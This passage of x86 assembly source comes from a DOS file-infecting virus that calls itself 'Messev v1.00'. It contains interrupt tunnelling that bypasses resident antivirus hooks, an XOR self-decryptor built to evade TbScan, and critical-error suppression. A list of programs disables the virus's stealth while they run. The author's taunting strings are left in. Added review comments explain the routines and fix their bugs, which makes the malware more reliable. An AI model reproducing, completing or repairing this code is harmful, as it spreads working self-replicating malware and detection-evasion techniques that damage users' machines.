OR CL, 00011110b ; 60 secs.
CALL DosInt
Close_File: MOV AH, 3Eh ; Close file.
CALL DosInt
Exit_Int_21h:
CALL Unhook_i24h
CALL Pop_All
JMP Continue
; === Call the tunnelled BIOS disk interrupt (INT 13h). ===
; Emulates "INT 13h" by pushing FLAGS and far-calling the address stored in
; CS:Int13h (filled in by Tracer), so whatever hooks sit on the live vector
; are bypassed.  No registers are saved here; the register contract is the
; callee's INT 13h contract.
; NOTE(review): Int13h is not declared in this listing.  If Tracer has not run
; yet, this far-calls whatever the slot holds -- use only after Tracer.
BiosInt:
PUSHF ; FLAGS image an IRET-returning handler expects.
CALL DWORD PTR CS:Int13h
RETN
; === Call the tunnelled DOS-interrupt (INT 21h). ===
; Emulates "INT 21h" via PUSHF + far CALL through CS:Int21h (set by Tracer),
; bypassing any resident INT 21h hooks (e.g. monitors).  CF/ZF results of the
; DOS call come back in FLAGS exactly as with a real INT 21h.
; NOTE(review): before Tracer has filled Int21h this calls 0:0 (see the
; Int21h DW 0,0 definition); callers must run Tracer first.
DosInt:
PUSHF
CALL DWORD PTR CS:Int21h
RETN
;====( Get interrupt vector )================================================
;
; Reads the real-mode IVT slot for interrupt AL straight from 0000:AL*4
; (no DOS call).  Interrupts are disabled around the read so the two words
; cannot be torn by a vector change in between.
;
; In:   AL = interrupt number to read.
; Out:  CX:BX = segment:offset of the current handler.
; AX, DS and SI (and all other registers) are preserved; flags are clobbered.
;============================================================================
GetInt:
        PUSH SI
        PUSH DS
        PUSH AX
        XOR AH, AH                      ; AX = AL
        SHL AX, 1                       ; AX = AL * 4 = slot offset in the IVT
        SHL AX, 1
        MOV SI, AX
        XOR AX, AX
        MOV DS, AX                      ; DS:SI = 0000:AL*4
        CLI
        LDS BX, DWORD PTR DS:[SI]       ; DS:BX = handler address
        MOV CX, DS
        STI
        POP AX
        POP DS
        POP SI
        RETN
;====( Set interrupt vector )================================================
;
; Writes CX:BX directly into the real-mode IVT slot for interrupt AL
; (0000:AL*4), bypassing DOS (INT 21h/25h).  Interrupts are disabled around
; the two-word store so no interrupt can fire through a half-written vector.
;
; In:   AL    = interrupt number to hook.
;       CX:BX = segment:offset of the new handler (an INPUT, not a result).
; Out:  nothing.  All registers preserved; flags clobbered.
;============================================================================
SetInt:
        PUSH SI
        PUSH DS
        PUSH DX                         ; not modified here; kept for stack-layout fidelity
        PUSH AX
        XOR AH, AH                      ; AX = AL
        SHL AX, 1                       ; AX = AL * 4
        SHL AX, 1
        MOV SI, AX
        XOR AX, AX
        MOV DS, AX                      ; DS:SI = 0000:AL*4
        CLI
        MOV DS:[SI+2], CX               ; segment
        MOV DS:[SI], BX                 ; offset
        STI
        POP AX
        POP DX
        POP DS
        POP SI
        RETN
; Host entry point and host stack (offset, segment pairs).  The defaults are
; what a fresh dropper copy uses: the Carrier stub, and a stack topping out
; 1 KB past Virus_End.  Presumably overwritten with the host's header values
; at infection time -- that code is not in this listing.
Old_Entry DW OFFSET Carrier, 0 ; Entrypoint host.
Old_Stack DW OFFSET Virus_End + 1024, 0 ; Stacksegment host.
; === Finds the original BIOS & DOS entrypoint. ===
; Interrupt tunnelling: hooks INT 01h, sets TF and then fires the interrupt
; selected by Trace_Mode through its *current* vector (INT 13h reset when
; Trace_Mode == Bios, otherwise INT 21h AX=3000h).  NewInt01h single-steps
; the hook chain and records the first CS:IP that lands in the target segment
; range (>= C000h for BIOS, below the first MCB for DOS), then stops tracing.
; Trace_Mode is also used as the interrupt number (MOV AL, Trace_Mode), so
; the Bios constant is presumably 13h.
;
; Writes: Dos_Segment, Int01h (scratch), and Int13h or Int21h.  Before the
; trace starts, the currently hooked vector is stored as a fallback, so the
; slot is usable even if the trace never reaches the target range.
; Registers are preserved (Push_All/Pop_All).
;
; NOTE(review): every variable here is addressed without a segment override,
; so this routine relies on DS == CS on entry (Hook_i24h, by contrast, uses
; explicit CS:).  With any other DS the results are written into a foreign
; segment -- confirm the call site sets DS = CS.
Tracer:
CALL Push_All
MOV AH, 52h ; List of lists (direct INT 21h: the tunnelled vector is not known yet).
INT 21h
MOV AX, ES:[BX-02h] ; Segment of the 1st MCB (word just below SysVars).
MOV Dos_Segment, AX ; NewInt01h treats anything below this as DOS.
MOV AL, 01h ; Save INT 01h.
CALL GetInt
MOV Int01h, BX
MOV Int01h+2, CX
MOV AL, 01h ; Hook INT 01h.
MOV BX, OFFSET NewInt01h
MOV CX, CS
CALL SetInt
MOV AL, Trace_Mode ; Get address from vector (Trace_Mode = INT number).
CALL GetInt
PUSHF
POP AX
OR AH, 01h ; TF on: from here on every instruction traps into NewInt01h.
PUSH AX
POPF
CMP Trace_Mode, Bios
JNE Mode_Dos
MOV Int13h, BX ; Fallback = live vector; replaced by NewInt01h when it finds the BIOS entry.
MOV Int13h+2, CX
XOR AH, AH ; Reset disk.
CALL BiosInt ; Traced call through the hook chain.
JMP Exit_Tracer
Mode_Dos:
MOV Int21h, BX ; Fallback = live vector; replaced by NewInt01h when it reaches DOS.
MOV Int21h+2, CX
MOV AX, 3000h ; Get DOS-version (OEM).
CALL DosInt ; Traced call through the hook chain.
Exit_Tracer:
PUSHF
POP AX
AND AH, NOT 01h ; TF off. Required, not "just in case": BiosInt/DosInt pushed a FLAGS
PUSH AX ; image with TF set, so the traced handler's final IRET re-arms tracing
POPF ; until it is cleared here.
MOV AL, 01h ; Restore INT 01h.
MOV BX, Int01h
MOV CX, Int01h+2
CALL SetInt
CALL Pop_All
RETN
; Author's text strings embedded in the code stream.  Not reachable as code
; (Tracer ends with RETN above; NewInt01h starts below); data only.
; I should be learning 4 my exams right now...
DB 'If I don''t pass... fuck it!', 0
DB 'SKLSUX!'
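; === INT 01h (single-step) handler used by Tracer. ===
; Frame after PUSH BP / MOV BP,SP:
;   [BP+2] = IP, [BP+4] = CS, [BP+6] = FLAGS of the instruction about to run;
;   [BP+7] is the high byte of FLAGS, whose bit 0 is TF (bit 8 of FLAGS).
; When CS is in the target range the CS:IP is recorded as the tunnelled entry
; point and TF is cleared in the saved FLAGS, which ends the trace there:
;   Trace_Mode == Bios : CS >= 0C000h  (system BIOS and adapter-ROM space)
;   otherwise          : CS <  Dos_Segment (below the first MCB, i.e. DOS)
; Nothing visible to the interrupted code is changed.
;
; Fix (review): the original pushed DS but never loaded it, so Trace_Mode,
; Int13h/Int21h and Dos_Segment were addressed through the *interrupted*
; code's DS.  That is fine only while tracing code that still has the virus's
; DS; any hook in the chain that switches DS before chaining (exactly what the
; tunnelling is meant to get past) made the handler read garbage and write the
; tunnelled address into a foreign segment.  DS is now set to CS.
NewInt01h:
        PUSH BP
        MOV BP, SP
        PUSH AX
        PUSH DS
        PUSH CS                         ; DS is the interrupted code's segment,
        POP DS                          ; not ours: address our variables via CS.
        MOV AX, [BP+4]                  ; CS of the traced instruction.
        CMP Trace_Mode, Bios
        JNE Trace_Dos
        CMP AH, 0C0h                    ; In BIOS (or option-ROM) segment?
        JB Not_In_Bios                  ; Keep tracing when not.
        MOV Int13h+2, AX
        MOV AX, [BP+2]                  ; IP of the traced instruction.
        MOV Int13h, AX
        JMP Diss_Flag
Trace_Dos:
        CMP AX, Dos_Segment             ; Below the first MCB, i.e. inside DOS?
        JNB Not_In_Bios                 ; Keep tracing when not.
        MOV Int21h+2, AX
        MOV AX, [BP+2]
        MOV Int21h, AX
Diss_Flag:
        AND BYTE PTR [BP+7], NOT 01h    ; Clear TF in the saved FLAGS: stop tracing here.
Not_In_Bios:
        POP DS
        POP AX
        POP BP
        IRET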
; Taken from Predator virus.
; Save all registers on the caller's stack and go back to the caller.
; The saved block has to sit *below* the caller's return address so that the
; matching Pop_All can pop it first, so the return address is parked in
; CS:Ret_Add, the registers are pushed, and control goes back with an
; indirect near JMP instead of RETN.
; Push order: FLAGS AX BX CX DX SI DI DS ES BP (Pop_All reverses it).
; Nesting is safe (Ret_Add is consumed before any further CALL), but the
; routine is not reentrant against an interrupt handler that itself uses
; Push_All/Pop_All during the POP..JMP window; no handler in this listing does.
Push_All:
POP CS:[Ret_Add] ; Park the return address (CS-relative: DS need not be CS).
PUSHF
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH DS
PUSH ES
PUSH BP
JMP CS:Ret_Add ; Back to the caller; the 10 saved words stay on
; the stack until Pop_All removes them.
; Restore the register block pushed by Push_All and go back to the caller.
; Must be reached with the Push_All block directly under the return address.
; FLAGS are restored last (POPF), so any ZF/CF computed by the calling
; routine is discarded -- results must be passed in memory.
Pop_All:
POP CS:[Ret_Add] ; Park the return address.
POP BP
POP ES
POP DS
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POPF
JMP CS:[Ret_Add] ; Back to the caller with the stack fully unwound.
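; Gets the SFT (system file table) entry for a handle. *UNDOCUMENTED*
; Two internal INT 2Fh calls (direct, not tunnelled):
;   AX=1220h, BX=handle    -> ES:DI -> JFT slot; the byte there is the SFT
;                             index (0FFh = slot not in use); CF set if the
;                             handle is invalid.
;   AX=1216h, BX=SFT index -> ES:DI -> SFT entry; CF set if out of range.
; In:   BX = handle.
; Out:  CF clear, ES:DI -> SFT entry.  CF set on any failure (ES:DI undefined).
; Clobbers AX and flags; BX is preserved.
;
; Fix (review): the original ignored CF from the 1220h call and dereferenced
; ES:DI anyway, and passed the SFT index with BH still holding the handle's
; high byte.  Invalid handles and unused slots now return CF set.
Get_DCB:
        PUSH BX
        MOV AX, 1220h                   ; Get JFT entry for handle BX.
        INT 2Fh
        JC Get_DCB_Done                 ; Invalid handle: report failure as-is.
        MOV BL, ES:[DI]                 ; SFT index of that slot.
        XOR BH, BH                      ; 1216h takes the index in all of BX.
        CMP BL, 0FFh                    ; Slot not open?
        JNE Get_DCB_Lookup
        STC                             ; Nothing to look up: fail.
        JMP SHORT Get_DCB_Done
Get_DCB_Lookup:
        MOV AX, 1216h                   ; Get SFT entry address.
        INT 2Fh
Get_DCB_Done:
        POP BX
        RETN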
; Name tables for Search_Table: fixed 7-byte entries (8.3 name truncated to
; seven characters, including the '.').  The entry count for No_Active is
; (End_No_Active - No_Active) / 7 = 5; the caller that passes CX is not in
; this listing.
TBSCAN DB 'TBSCAN.' ; Single-entry table (TbScan scanner).
; During execution of one of these programs, the virus will be inactive,
; (no stealth, no infect).
No_Active:
DB 'PKZIP.E' ; PKZIP.EXE
DB 'ARJ.EXE' ; ARJ.EXE
DB 'LHA.EXE' ; LHA.EXE
DB 'RAR.EXE' ; RAR.EXE
DB 'CHKDSK.' ; CHKDSK.EXE
End_No_Active:
; === Hook INT 24h (critical-error handler) with NewInt24h. ===
; Saves the current vector in CS:Int24h so Unhook_i24h can put it back.
; All registers are preserved (Push_All/Pop_All).
; NOTE(review): CS:Int24h is a single slot; a second Hook_i24h before the
; matching Unhook_i24h saves NewInt24h itself and the original vector is lost.
Hook_i24h:
        CALL Push_All
        MOV AL, 24h
        CALL GetInt                     ; CX:BX = current INT 24h (GetInt keeps AX)
        MOV CS:Int24h, BX
        MOV CS:Int24h+2, CX
        MOV CX, CS                      ; CX:BX = our dummy handler
        MOV BX, OFFSET NewInt24h
        CALL SetInt                     ; AL is still 24h
        CALL Pop_All
        RETN
; Author's text string embedded in the code stream; data only, never
; executed (Hook_i24h returns above, Unhook_i24h starts below).
; I would really recommend getting this CD
; (yes, it's da theme-music from Carmageddon).
DB '[ DEMANUFACTURE - FEAR FACTORY ]'
; === Restore the INT 24h vector saved by Hook_i24h. ===
; All registers are preserved; ES is used as scratch for the far pointer
; but is put back by Pop_All.
Unhook_i24h:
        CALL Push_All
        LES BX, DWORD PTR CS:Int24h     ; ES:BX = saved handler
        MOV CX, ES                      ; CX:BX as SetInt expects it
        MOV AL, 24h
        CALL SetInt
        CALL Pop_All
        RETN
; Dummy Critical Error handler.
; Answers every critical error with AL = 03h ("fail the DOS call"), so while
; Hook_i24h is active a drive/media error comes back to the caller as an
; ordinary error return instead of the Abort/Retry/Ignore prompt.
NewInt24h:
MOV AL, 03h ; 3 = fail
IRET
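;=======================================================================
; Search a table & (re)set zeroflag depending on result. ZF when found.
;
; DS:SI = Line   (a path; the 7 bytes after the last '\' preceding the
;                 first '.' are compared, e.g. "C:\DOS\CHKDSK.EXE" -> "CHKDSK.")
; CS:DI = Table  (CX consecutive 7-byte entries, see No_Active)
; CX = Number of names to compare.
;
; Returns: ZF set when the name matches an entry, ZF clear otherwise.
; All registers are preserved except CX (consumed by LOOP).
;
; Fixes (review): DX is now saved/restored -- the original loaded the 3rd
; name word into DX and returned with it clobbered.  DF is now left clear:
; the original returned with DF still set from the backward scan (STD), so a
; caller's next REP MOVS/STOS ran backwards unless it did its own CLD.
;
; NOTE(review): the backward scan for '\' is bounded by 127 bytes, not by the
; start of the string.  A name with no '\' (a bare relative name such as
; "CHKDSK.EXE") makes REPNZ SCASB walk up to 127 bytes *before* DS:SI and
; compare whatever sits there.  Callers must pass a path containing a
; backslash, or this needs a lower bound of SI.
;=======================================================================
Search_Table:
        PUSH AX
        PUSH BX
        PUSH DX                         ; DX is used as scratch below
        PUSH SI
        PUSH DI
        PUSH BP
        PUSH DS
        PUSH ES
        PUSH CX
        PUSH DI                         ; Table pointer, restored before the compare loop.
        PUSH ES
        PUSH DS                         ; ES:DI = DS:SI for the string scans.
        POP ES
        PUSH SI
        POP DI
        MOV AL, '.'
        CLD
        MOV CX, 127                     ; Scan forward for the first '.' (127 bytes max).
        REPNZ SCASB                     ; DI -> byte after '.' (or SI+127 if none).
        MOV AL, '\'
        STD
        MOV CX, 127                     ; Scan backward for the last '\' before it.
        REPNZ SCASB                     ; DI -> byte before '\': name starts at DI+2.
        CLD                             ; Do not leak DF=1 to the caller.
        MOV BP, ES:[DI+2]               ; Name bytes 0-1
        MOV BX, ES:[DI+4]               ;            2-3
        MOV DX, ES:[DI+6]               ;            4-5
        MOV AL, ES:[DI+8]               ;            6
        POP ES
        POP DI                          ; CS:DI = table again.
        POP CX                          ; CX = entry count.
Find_Match:
        CMP CS:[DI+0], BP
        JNE Not_Found
        CMP CS:[DI+2], BX
        JNE Not_Found
        CMP CS:[DI+4], DX
        JNE Not_Found
        CMP CS:[DI+6], AL
        JNE Not_Found
Comple: CMP AX, AX                      ; Found: ZF = 1.
        JMP Exit_Sea
Not_Found:
        ADD DI, 7                       ; Next 7-byte entry.
        LOOP Find_Match
        XOR AX, AX                      ; Not found: ZF = 0 (AL = 0FFh vs AH = 0).
        NOT AL
        CMP AL, AH
Exit_Sea:
        POP ES
        POP DS
        POP BP
        POP DI
        POP SI
        POP DX
        POP BX
        POP AX
        RETN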
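; Is the handle in BX corresponding to a file or a device? (sets ZF).
; Uses IOCTL AX=4400h (get device information) through the tunnelled INT 21h;
; bit 7 of DL is set for a character device and clear for a disk file.
; In:   BX = handle.
; Out:  ZF = 1 -> file; ZF = 0 -> device, or the IOCTL failed.
; Clobbers AX and DX (AX = DOS error code on failure) and flags.
;
; Fix (review): the original tested DL even when the call failed (CF set),
; where DX is undefined -- a bad handle could then be reported as a file.
Check_Handle:
        MOV AX, 4400h                   ; IOCTL: get device information
        CALL DosInt
        JNC Check_Handle_Info
        MOV DL, 80h                     ; Call failed: answer "not a file" (ZF clear).
Check_Handle_Info:
        TEST DL, 80h                    ; Bit 7 set = character device.
        RETN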
; Last data inside the encrypted region.  Everything from offset 0 up to
; End_Encrypted_File is XORed with File_Key by the decryptor at START.
; The code that uses Port_Driver (a Windows 9x floppy port-driver path) and
; Parameters (a CR-terminated command tail) is not in this listing.
Port_Driver DB 'C:\WINDOWS\SYSTEM\IOSUBSYS\HDFLOP.PDR', 0
Parameters DB ' NM CO', 0Dh
End_Encrypted_File: ; Also the byte count used by the decrypt loop.
NOP_Msg DB '$' ; Empty string for INT 21h AH=09h (the '$' terminator only).
; === VIRUS ENTRYPOINT ===
; Runs first in an infected host.  Saves every register (same order as
; Push_All, inlined because nothing is decrypted yet), XOR-decrypts the body
; in place from offset 0 up to End_Encrypted_File, then jumps to Entry
; (outside this listing).  Assumes CS is the start of the virus image
; (BX counts from 0).
START:
PUSHF ; Save registers.
PUSH AX ; (Same as Push_All).
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH DS
PUSH ES
PUSH BP
; Disabled: masking IRQ1 at the PIC would lock the keyboard during decryption.
;IN AL, 21h ; Take-out keyboard.
;OR AL, 02h
;OUT 21h, AL
PUSH CS
POP DS ; DS = CS: the body is decrypted through DS.
XOR BX, BX
MOV CX, OFFSET End_Encrypted_File ; Number of bytes to decrypt.
Decrypt_Byte: XOR BYTE PTR [BX], 0 ; Decrypt our body.
ORG $-1 ; Step back one byte: File_Key overlays the XOR immediate above,
File_Key DB 0 ; so the per-copy key is patched directly into the instruction.
INC BX
MOV AH, 09h ; Prints an empty string: a real DOS call inside the
MOV DX, OFFSET NOP_Msg ; decrypt loop (Anti-TbScan), one INT 21h per byte.
INT 21h
LOOP Decrypt_Byte
JMP Entry ; Decrypted code; Entry is not in this listing.
Virus_End:
; === Host EXE header image and scratch variables ===
; These lie past Virus_End, i.e. outside the encrypted image, and are runtime
; scratch only.  The default stack (Old_Stack) tops out 1 KB past Virus_End
; and grows down towards them.  Header mirrors the MZ header layout, so the
; host header can presumably be read straight into it (that code is not here).
Header:
Mark DW 0 ; .EXE-identifier (always 'MZ').
Mod512 DW 0 ; Bytes in last 512-byte page.
Byte_Pages DW 0 ; Number of 512-byte pages.
Num_Reloc DW 0
HeaderSize DW 0 ; In paragraphs.
MinMem DW 0
MaxMem DW 0
Init_SS DW 0
Init_SP DW 0
Checksum DW 0 ; Checksum, unused by MS-DOS, used by us (presumably as infection marker).
Init_IP DW 0
Init_CS DW 0
; === TEMP VARIABLES ===
Status DB 0
Init_Status DB 0
Int01h DW 0, 0 ; Original INT 01h while Tracer runs.
Int21h DW 0, 0 ; Tunnelled INT 21h (filled by Tracer/NewInt01h; 0:0 before).
Int24h DW 0, 0 ; Original INT 24h saved by Hook_i24h.
New_Pos DW 0, 0
Old_Pos DW 0, 0
File_Pos DW 0, 0
Read_Bytes DW 0
Padding DW 0
Dos_Segment DW 0 ; 1st Memory Control Block; lower segments count as DOS.
Trace_Mode DB 0 ; Are we tracing BIOS or DOS-interrupt? (also used as the INT number)
Ret_Add DW 0 ; Parked return address for Push_All/Pop_All (not reentrant).
Tunnel_Int DW 0, 0 ; Address of the tunneled interrupt.
Read_Buffer DW 0, 0
FileTime DW 0
FileDate DW 0
Temp DB 0
Buffer: ; Shares its address with Carrier below: using Buffer overwrites the stub.
; === Carrier: the dropper's built-in "host" ===
; Default target of Old_Entry.  Prints the warning and exits with code 0.
; Located at Buffer, so it only survives until Buffer is first used.
Carrier:
PUSH CS
POP DS ; DS = CS for the message offset.
MOV AH, 09h ; Display warning.
MOV DX, OFFSET Warning_Msg
INT 21h
MOV AX, 4C00h ; Exit to DOS.
INT 21h
Warning_Msg DB 'WARNING: This program is infected with the '
DB 'Messev v1.00 virus!', 0Ah, 0Dh, '$' ; LF then CR (reversed from the usual CR/LF; cosmetic).
END START